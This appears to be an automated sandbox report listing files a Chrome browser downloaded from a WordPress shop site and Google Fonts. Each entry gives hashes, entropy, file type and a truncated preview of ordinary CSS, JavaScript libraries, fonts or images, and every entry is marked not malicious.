                                                                                                          SHA1:227FEE13CEB7C410B5C0BB8000258B6643CB6255
                                                                                                          SHA-256:89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
                                                                                                          SHA-512:2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                          Preview:wOF2......Hh..........H..............................Z..|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.|.......%*..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`*m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R*...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.*+.M E..`......R.$T
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (14615), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):14615
                                                                                                          Entropy (8bit):4.664430727671477
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:0Mn40ynTfc3afJnEV2KaCNjOTWIfJaNNcH9tPO5:F40yTfXBE8pvTWk0Ncdw5
                                                                                                          MD5:7A162CA35A696BA5D54949E3C7C43887
                                                                                                          SHA1:9E6879C53CF32F8F00CCA038989A01A22610B915
                                                                                                          SHA-256:6610CFB284C5370ED1CD73333301A0FD21D0149EFDCD366DD7B8FE35A5949806
                                                                                                          SHA-512:4E29FDF3FF2F4084A6A3B3542FD3355F4C28206B5815548496953EE941BC21E3FFD22E08362CA2975F2F31AFFFE87AB7B74D7BF8DFB690A424A887E66ACE411A
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/css/select2.css?ver=6.6.1
                                                                                                          Preview:.select2-container{box-sizing:border-box;display:inline-block;margin:0;position:relative;vertical-align:middle}.select2-container .select2-selection--single{box-sizing:border-box;cursor:pointer;display:block;height:28px;margin:0 0 -4px;-ms-user-select:none;user-select:none;-webkit-user-select:none}.select2-container .select2-selection--single .select2-selection__rendered{display:block;padding-left:8px;padding-right:20px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.select2-container .select2-selection--single .select2-selection__clear{position:relative}.select2-container[dir=rtl] .select2-selection--single .select2-selection__rendered{padding-right:8px;padding-left:20px}.select2-container .select2-selection--multiple{box-sizing:border-box;cursor:pointer;display:block;min-height:32px;-ms-user-select:none;user-select:none;-webkit-user-select:none}.select2-container .select2-selection--multiple .select2-selection__rendered{display:inline-block;overflow:hidden;padding-left:8px
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):3340
                                                                                                          Entropy (8bit):4.528023025464945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ld/N5pGRF5FXRhqyGDXU8zXrCgxgOCrtGuXRzGzX7+h6Kp+xZ0NNv:ld/N5pGRF5/hqyGbj+gxgOCrtGSzG3Ux
                                                                                                          MD5:AA872DB78AC1FCFF6FC07934119E7971
                                                                                                          SHA1:EA2F0148E17C2015CD218EBE0963B011B7177580
                                                                                                          SHA-256:A5B55ACB8BFE342B6A815A98838145D70F77F4BB0ED9EF2AF93136DE3BD454BC
                                                                                                          SHA-512:BFDE4CAEA57C782468F647DCCA5D1DDEA191BA11E8E3D769C5B028249C87C41632A0EC5D9FD38A38A75940ED0D6181FDD1FCC6FEEF39F61E510D0089EFE9A321
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/html_types/checkbox.js?ver=3.3.0
                                                                                                          Preview:"use strict";.function woof_init_checkboxes() {. if (icheck_skin != 'none') {.. jQuery('.woof_checkbox_term').iCheck('destroy');.. jQuery('.woof_checkbox_term').iCheck({. checkboxClass: 'icheckbox_' + icheck_skin.skin + '-' + icheck_skin.color,. });... jQuery('.woof_checkbox_term').off('ifChecked');. jQuery('.woof_checkbox_term').on('ifChecked', function (event) {. jQuery(this).attr("checked", true);. jQuery(".woof_select_radio_check input").attr('disabled','disabled');. woof_checkbox_process_data(this, true);. });.. jQuery('.woof_checkbox_term').off('ifUnchecked');. jQuery('.woof_checkbox_term').on('ifUnchecked', function (event) {. jQuery(this).attr("checked", false);. woof_checkbox_process_data(this, false);. });.. //this script should be, because another way wrong way of working if to click on the label. jQuery('.woof_checkbox_label').off
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):60554
                                                                                                          Entropy (8bit):4.536601709264332
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:SP3uQPHtePui9BtZy5I/ox7AWPjgmcIX0ZDwnqto3bj+p+e4JZTh9xoct8vbP0aO:L96xU2jOQi+JmJ21by3HY33Nf4Fi
                                                                                                          MD5:592C33238192E558C6BC01AB4897034A
                                                                                                          SHA1:C99D5C72D4A26C99112BD13CE58416AC461C4C19
                                                                                                          SHA-256:D510064A15E8A07E28305FE1CBB7BD22BAA01076D25DC14669914727D39A38D7
                                                                                                          SHA-512:34D273FA0F43DD53A9E7B5984E2DCE1E9544CC239D13A4B6EEA4B82C868F3011566DCAC9AF8C406B3C5968089DB12DEA0F0148C7805B47D658B245844ABC9006
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/front.js?ver=3.3.0
                                                                                                          Preview:"use strict";.var woof_redirect = '';//if we use redirect attribute in shortcode [woof].var woof_reset_btn_action = false;..jQuery(function () {. try. {. woof_current_values = JSON.parse(woof_current_values);. } catch (e). {. woof_current_values = null;. }. if (woof_current_values == null || woof_current_values.length == 0) {. woof_current_values = {};. }..});..//***.if (typeof woof_lang_custom == 'undefined') {. var woof_lang_custom = {};/*!!important*/.}.if (typeof woof_ext_filter_titles != 'undefined') {. woof_lang_custom = Object.assign({}, woof_lang_custom, woof_ext_filter_titles);.}..jQuery(function ($) {. jQuery('body').append('<div id="woof_html_buffer" class="woof_info_popup" style="display: none;"></div>');.//http://stackoverflow.com/questions/2389540/jquery-hasparent. jQuery.extend(jQuery.fn, {. within: function (pSelector) {. // Returns a subset of items using jQuery.filter. return this.filte
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (10544)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):10682
                                                                                                          Entropy (8bit):5.103165363656437
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:4ASLFBb5B1tkej/q9bPcahsL3SaDY+Nhm4isuSnFqk+n0eH6RxljwNyJJN+fwrE:EXnTj/q9b0auiGYchm5suUqkG6v6UUfL
                                                                                                          MD5:4EEE50AC6F4F364BA3A284D0753DDAE3
                                                                                                          SHA1:A8E7E824E6824AE0B370FF36E2C07CA07276FAE0
                                                                                                          SHA-256:B936DB5880AA9B6B2F26A8D32FC2B689FB75F69D971B94194F16DBA801221FFE
                                                                                                          SHA-512:AD7154338F51A1FD2745D1321412F1D418B76CD99F8B439E5ECBD8CDAA7AC09355EE30D4F26044988ACD739BA8B059CA91316798CB0E9B6432D86F006AD49B02
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.9.0
                                                                                                          Preview:/*! dialogs-manager v4.9.0 | (c) Kobi Zaltzberg | https://github.com/kobizz/dialogs-manager/blob/master/LICENSE.txt. 2021-08-15 18:13 */.!function(p,t){"use strict";var y={widgetsTypes:{},createWidgetType:function(t,e,n){n=n||this.Widget;function i(){n.apply(this,arguments)}var o=i.prototype=new n(t);return o.types=o.types.concat([t]),p.extend(o,e),(o.constructor=i).extend=function(t,e){return y.createWidgetType(t,e,i)},i},addWidgetType:function(t,e,n){return e&&e.prototype instanceof this.Widget?this.widgetsTypes[t]=e:this.widgetsTypes[t]=this.createWidgetType(t,e,n)},getWidgetType:function(t){return this.widgetsTypes[t]}};y.Instance=function(){var n=this,e={},i={};this.createWidget=function(t,e){t=new(y.getWidgetType(t))(t);return t.init(n,e=e||{}),t},this.getSettings=function(t){return t?i[t]:Object.create(i)},this.init=function(t){return p.extend(i,{classPrefix:"dialog",effects:{show:"fadeIn",hide:"fadeOut"}},t),e.body=p("body"),n},n.init()},y.Widget=function(n){function e(t,e){var
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (5082)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5125
                                                                                                          Entropy (8bit):5.463271316022447
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:BZN1YdL61YHU69GP29uMT+DhrDvlw6NV2LUVcOxjefbGOjD0vD862:/N0L61YHUhoRsr5NkQdxakQ62
                                                                                                          MD5:FE22279E3C53818E1349FACDC06D87BE
                                                                                                          SHA1:5226C06CD30967301E0DE0ECC5FB935B060BD768
                                                                                                          SHA-256:5B53E811E2F70AAE99B19DDE4E877B98382A294A0727B2C8AB788BA030E858C9
                                                                                                          SHA-512:9E26F6FFEA34C1BDE51251C344413B529B8E3D020FE4BCE75DF506F5650DA5BE9E763A31D0A10D2CCE1FC05C5A464F1F57920A47E0BF606CF05970653E0863F4
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! elementor-pro - v3.6.4 - 15-03-2022 */.(()=>{"use strict";var e,r,_,a={},c={};function __webpack_require__(e){var r=c[e];if(void 0!==r)return r.exports;var _=c[e]={exports:{}};return a[e](_,_.exports,__webpack_require__),_.exports}__webpack_require__.m=a,e=[],__webpack_require__.O=(r,_,a,c)=>{if(!_){var n=1/0;for(u=0;u<e.length;u++){for(var[_,a,c]=e[u],i=!0,t=0;t<_.length;t++)(!1&c||n>=c)&&Object.keys(__webpack_require__.O).every((e=>__webpack_require__.O[e](_[t])))?_.splice(t--,1):(i=!1,c<n&&(n=c));if(i){e.splice(u--,1);var o=a();void 0!==o&&(r=o)}}return r}c=c||0;for(var u=e.length;u>0&&e[u-1][2]>c;u--)e[u]=e[u-1];e[u]=[_,a,c]},__webpack_require__.f={},__webpack_require__.e=e=>Promise.all(Object.keys(__webpack_require__.f).reduce(((r,_)=>(__webpack_require__.f[_](e,r),r)),[])),__webpack_require__.u=e=>714===e?"code-highlight.28a979661569ddbbf60d.bundle.min.js":721===e?"video-playlist.e85695d7b9171d89c565.bundle.min.js":256===e?"paypal-button.3d0d5af7df85963df32c.bundle.min.js":24
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (3835)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):306901
                                                                                                          Entropy (8bit):5.579453424804088
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:X5NGUiz8zn9iZD9Wy9nnQyDy4gElQD4xgeb:X5uzCnqD5PYW
                                                                                                          MD5:B15067B738C42C249FA8FAAC7C53E24C
                                                                                                          SHA1:BD4B057EA2E04D18E0FC0DD9E7BFD6095790427F
                                                                                                          SHA-256:4C4DAB948588976DF60CC5DD2F3DBE817F15A1560C771C02E03452724ED7AA59
                                                                                                          SHA-512:F4DB7371DDA7A852790F5FD9E1EBB1394E4C8771DE048A43E960B68AA8707850BFE81A6C22068381F187F5C97691E63EBCCCCE03DB5490D463A4C3A9B68A61FE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":11,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (57726)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):57912
                                                                                                          Entropy (8bit):4.690906492963222
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:0Eh31IPiyXNq4YxBowbgJlkwF//zMQyYJYX9Bft6VSzO:0E0PxXE4YXJgndFTfy9lt5C
                                                                                                          MD5:EEB705D0BDCCFD645D3BBD46DD1FBAB3
                                                                                                          SHA1:066DEF290F42ED8C00860E573CC880BD46E9CED4
                                                                                                          SHA-256:D01A2BA2805C78957E15A2958135DE0F3CB88E95159DD0F6C0A032BD76B1B0E9
                                                                                                          SHA-512:39D11741808E95D8EA504B2E30AB19463F771EDDB741196121BF04FD7D2C6F066199EF1E530EA0F2AEC077118929A91C05BBFBFBF3D7D067366ED7FB46EF1C64
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver=5.15.3
                                                                                                          Preview:/*!. * Font Awesome Free 5.15.3 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pu
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (17785), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):17785
                                                                                                          Entropy (8bit):4.792312306991425
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:eouzxACuzxehFkOujMs+7yOuruzxVBgPG05cKn+uhuzxvOgFO8S05cGEnuOuzxEM:yTskgvrg3dg1Dgxrnp6gcu
                                                                                                          MD5:83A833C196DC1815B1BABD0152768E38
                                                                                                          SHA1:3DDCB05D591E32F6CC2270F3AD2EDD3BE5770AE1
                                                                                                          SHA-256:17E42B859093F7827A96A2CD7C90394E15D3ABBB1F4FF1F9C131A43519C35CE2
                                                                                                          SHA-512:955422648F78241C56E460B98CA1FF4FAFD0A18FDE5DA00A59710752E9DC797C8D5FFDB73F556A08FF546FE2EAC02353A36B46EEA6C26A353C10F7C15AA20F41
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/elementor/css/post-8052462589213.css?ver=1733126350
                                                                                                          Preview:.elementor-8052462589213 .elementor-element.elementor-element-f9676f7 > .elementor-container{min-height:90vh;}.elementor-8052462589213 .elementor-element.elementor-element-f9676f7{margin-top:0px;margin-bottom:0px;}.elementor-8052462589213 .elementor-element.elementor-element-e78299e > .elementor-widget-wrap > .elementor-widget:not(.elementor-widget__width-auto):not(.elementor-widget__width-initial):not(:last-child):not(.elementor-absolute){margin-bottom:0px;}.elementor-8052462589213 .elementor-element.elementor-element-b25c6a2 > .elementor-container{min-height:100vh;}.elementor-8052462589213 .elementor-element.elementor-element-b25c6a2{margin-top:0px;margin-bottom:050px;}.elementor-8052462589213 .elementor-element.elementor-element-92f369e > .elementor-widget-wrap > .elementor-widget:not(.elementor-widget__width-auto):not(.elementor-widget__width-initial):not(:last-child):not(.elementor-absolute){margin-bottom:0px;}.elementor-8052462589213 .elementor-element.elementor-element-5330b71 >
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 18596, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):18596
                                                                                                          Entropy (8bit):7.988788312296589
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:h5D5WUhNanar/Z19V6iGCYIqoPfHwfr13GPgqbrxremyFKKWB:h/NaOrBGCYIBPfQD1xqPhl
                                                                                                          MD5:C83E4437A53D7F849F9D32DF3D6B68F3
                                                                                                          SHA1:FABEA5AD92ED3E2431659B02E7624DF30D0C6BBC
                                                                                                          SHA-256:D9BADA3A44BB2FFA66DEC5CC781CAFC9EF17ED876CD9B0C5F7EF18228B63CEBB
                                                                                                          SHA-512:C2CA1630F7229DD2DEC37E0722F769DD94FD115EEFA8EEBA40F9BB09E4FDAB7CC7D15F3DEEA23F50911FEAE22BAE96341A5BACA20B59C7982CAF7A91A51E152F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
                                                                                                          Preview:wOF2......H...........H=................................|.`..J.H..<........>..Z...x.6.$..0. ..~. ..)...%.m..t.D<...U.c....D....@........@e..a..R./<...p..q..q....S<.nm...X..(ER....e.....O.?Q_..FYH......ml.E..?;X0>.f.Y.,.n.a...._h8c.006U.cS..3.m.Or..I9..5.;.=..'!..c.O...W.K..f....k..&Xq..Y?.r...%.S..y.:q*.......u*D.d.R..'..Q,L.... e`..=?.{...e%{.....3+$.....NkF2...... ._}..2]....,.F.u.S4O.~w).G..../]}6.nVwKj.h@........5.7P....i..r........U?.........q..Cm......g...\.zu.....P..|....5G$...4k$..L..g..".y..?..6...O...e..@..0TYh..v........M.....#B...O.i.G$.Bq..m.A.s~...A...c.....25K.....B..<..w.A....G.O...A......A,y"q....q<....N..{Ta..!.|vzo.;9.5>.>....7I.i.Ld.4..y...].g.....'m_(...O-..}.K.(....R..2.q.z9.D..]..$.#$.:x..:{..m.OF...K[J. ......lpH.#%V....4.;l.<..J.6.T..a...I..|..zj.k.-...y...#..e.1,s....<.HX.....z{L....'.$. "..tY..m.<.\8P. a.......x.W\.b.%...RA.\.... M.......v1......#...............`.c..%.Nc.d.qP.68....$<.O.S_7...U.].jn>@.3.c..wO..>.>a.qg....\..kb.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", progressive, precision 8, 2560x1440, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):323612
                                                                                                          Entropy (8bit):7.973024922328179
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:YgOdpN9VT4vUieMxg0LphQbQlPNRnT6e4M8yCRaylf2Pi+MScnz5jOPY61u:0j9d+eo/DOs/nTmMgaG71QY3
                                                                                                          MD5:29EF2A1A2E34039CE56AA4C6469F6655
                                                                                                          SHA1:CAF3E4C36AE13E3B9F73B40697D4D1019660C4BC
                                                                                                          SHA-256:261C30323F7676FB0F1523012B9A5B857125FA4D3BD484FAA016042450B28957
                                                                                                          SHA-512:A4A6D49100E18C58258696D3E634B1D52B95106E528CD399D2FFEF686A4174F962F5B988B156A17E2AB1C9E42ABE0DDB98B993BF6E6D4497F5D8AFD398E4E281
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".............................................................................P.5)...I.H.a...I.V`...4..f....#...]{.....3?.../..W.^..d.`..=.....?..z.KR.z...G....:X..e..;.....^.0A.eU.....^;..98...c.bymW...i.....4........./BXuT.dU.,...R.o5<...<...VU.g...|.{h...<.......-.....OD....W......h.NoJ0.z^...z.w.iNm...............`.................&...b. i. .......................L....q..e6..Qd.2#.L..@.`.J,..1.....$...@........ b.&..............@...... `....C..Q..R.E..b.d>.3..$.......O..y..2.D.l.......=C.Y`,(...N.4y.7S..}....g..N..g.).y+..K...\u...7w.........{.f.u..Rt".\.I\x.=G....W5;3.V.....:.......7....<..Yl..Ue.._..;m$k#.W..?>.._...x.9........!..i..]q.S.o..-g.......]..W...{;k.R..sj..1.h...b`................ .. h....h......b`.........4.0....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", progressive, precision 8, 2560x1440, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):409772
                                                                                                          Entropy (8bit):7.9715050160079
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:CY8ImzF+S6Siwg1sCz4OayZ2RVIC6PfeaLTbdUSrTBM:GIndllayMAC63jLTBjTS
                                                                                                          MD5:3DFF97245159F2AC73281A5675AAE802
                                                                                                          SHA1:6EBC82BCDB21084DE875DD19BDAE25879A8102B2
                                                                                                          SHA-256:32DD257CE6132923E904DE23B47F9B49B280CF69063344192F9A436EF6F95561
                                                                                                          SHA-512:C2621F0968CC6DC63625E06FC8D566DBE720D2E5F43C2E9B8556E3B0D3EE725DD95B51A876A652C5750E28288C8F39AA8D504BDC2FA301F89E6B9B8DF9CCFF9B
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."....................................................................................f....|].+..i^=...t-.n...]U.. `....<.+.ug..v....e....Uo.....S.v..T......I...*.b..P..8.R..tD...+<n/s...g.s..K.K7i.LGE=..n....N]'X.E...z).b........!...........LCC.................1.@.................4.@....h.....L..........0C.....`...L.d...A.lG&.L..0...L...L.K.B-.I.......)B@6$....Y..Mk..2.FQQ.@.%..FP_......*.@a..Y...G....N..>....=(th..jE4_Ut/..w.q......q<.ks..*.-.2L.t]s...o.'r\.....tZ....}N&Z....g.0l&.jP..~m...`..I..0.,EvF@ UZ.O7......+gr.._.x....U....:.C..B.+=..4I..!....................@..@........................&R..................................(...0....g;......2.1..M......J.D....a.....#@. #:.P..B.l-.@.....G.8L...*.\...(J..3..LPFQ$..,*g.\.AFV....Ng^!N.".
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (714)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):11295
                                                                                                          Entropy (8bit):4.737568599002979
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:US7/TLi/1LiAIK8fC6uZt9Hzq12wQBcPbeco0oeI13TF5M:pjTL21LN96uP22wGcPbecDq1HM
                                                                                                          MD5:1053E983F2122BD8B762EC1CBEFB8C84
                                                                                                          SHA1:A8C212872DAF48C4C0B2A2F3CCD947F52D372F2F
                                                                                                          SHA-256:77D3C5EA92A8602F15B9648B373782EA2165D24880313A6CF01E0952CCD8FFAD
                                                                                                          SHA-512:52581B22C2F77D44A0544FED9D0F608938C12F843563D64BF11493B1D4E4ABAE15D48739A66C8916C2F608C78AD55242D7BE1A4E873638ACA1823C902EF83F7F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/themes/ciena/assets/css/body_color.css?ver=1.0.8
                                                                                                          Preview:body {. color: #6d6d6d;.}...woocommerce form .form-row label, .woocommerce-page form .form-row label {. color: #6d6d6d;.}..#fm-account-modal form.woocommerce-form.woocommerce-form-register .form-row label, #fm-account-modal form.woocommerce-form.woocommerce-form-login .form-row label, .woocommerce-account form.woocommerce-form.woocommerce-form-register .form-row label, .woocommerce-account form.woocommerce-form.woocommerce-form-login .form-row label {. color: #6d6d6d;.}...theme-ciena .fmc-checkout-step .step.finish span.label:not(:hover) {. color: #6d6d6d;.}...woocommerce-form-coupon-toggle .woocommerce-info, .woocommerce-form-login-toggle .woocommerce-info {. color: #6d6d6d;.}...woocommerce-checkout form.woocommerce-form-coupon .form-row-first input.input-text {. color: #6d6d6d;.}...woocommerce-cart .woocommerce-cart-form table.woocommerce-cart-form__contents td dl.variation dd + dt::before {. color: #6d6d6d;.}..woocommerce-cart .woocommerce-cart-form table.woocommerce-cart-for
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8189)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):21464
                                                                                                          Entropy (8bit):5.303481082929494
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:G/rsrDr8LVyraS3dtrqorqr8hrpCip8fuxNhBGX0CiS9rH/OrLrErJ29FkFvd:iS33Z5vK47kv
                                                                                                          MD5:8FBC22C79D40119DDE9A5D16897002B9
                                                                                                          SHA1:E9837519ACA724457792E2D5EE98A97A0367CDF9
                                                                                                          SHA-256:7E84C9F8D71BC6EB2DAC2FCE59A6CAEA62DA51FFA8CF56B41806F59386AB1322
                                                                                                          SHA-512:3118A198A3710C839C15D6C4B5DC9F9ADCD637913AF2E26F438B01C80B27281F4937E25AAD2817855D8B3EB36207C61AE16D62B17E698799C5316E86F52AC6FC
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3
                                                                                                          Preview:/*! jQuery UI - v1.13.3 - 2024-04-26.* https://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-patch.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sort
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2047
                                                                                                          Entropy (8bit):4.555981853453777
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:73bMGvdswKn4YQwIEmie1jzi1SgTiS2Z9LDROLsqN2KGQf:rokdsBQ/EcvSe1ORN2HQf
                                                                                                          MD5:90BFF8B5E70854D873E53E3337349D96
                                                                                                          SHA1:01726220EBE9E5E3AD06BF0823995B5A6F15C9D7
                                                                                                          SHA-256:43841FE177E4EEFB459A3CCE0901D9B77E7C224F6FACC264BEF5C2DFD5FB3461
                                                                                                          SHA-512:47A263A8489D6B13385E39D762E0679397D034C7D036A90061C4B3773C7BAE6B4E67E0A0A8B3725AE0A20CCDF9830F93BE158099EC5DE7092574D78D30AC5BD0
                                                                                                          Malicious:false
                                                                                                          Reputation:low
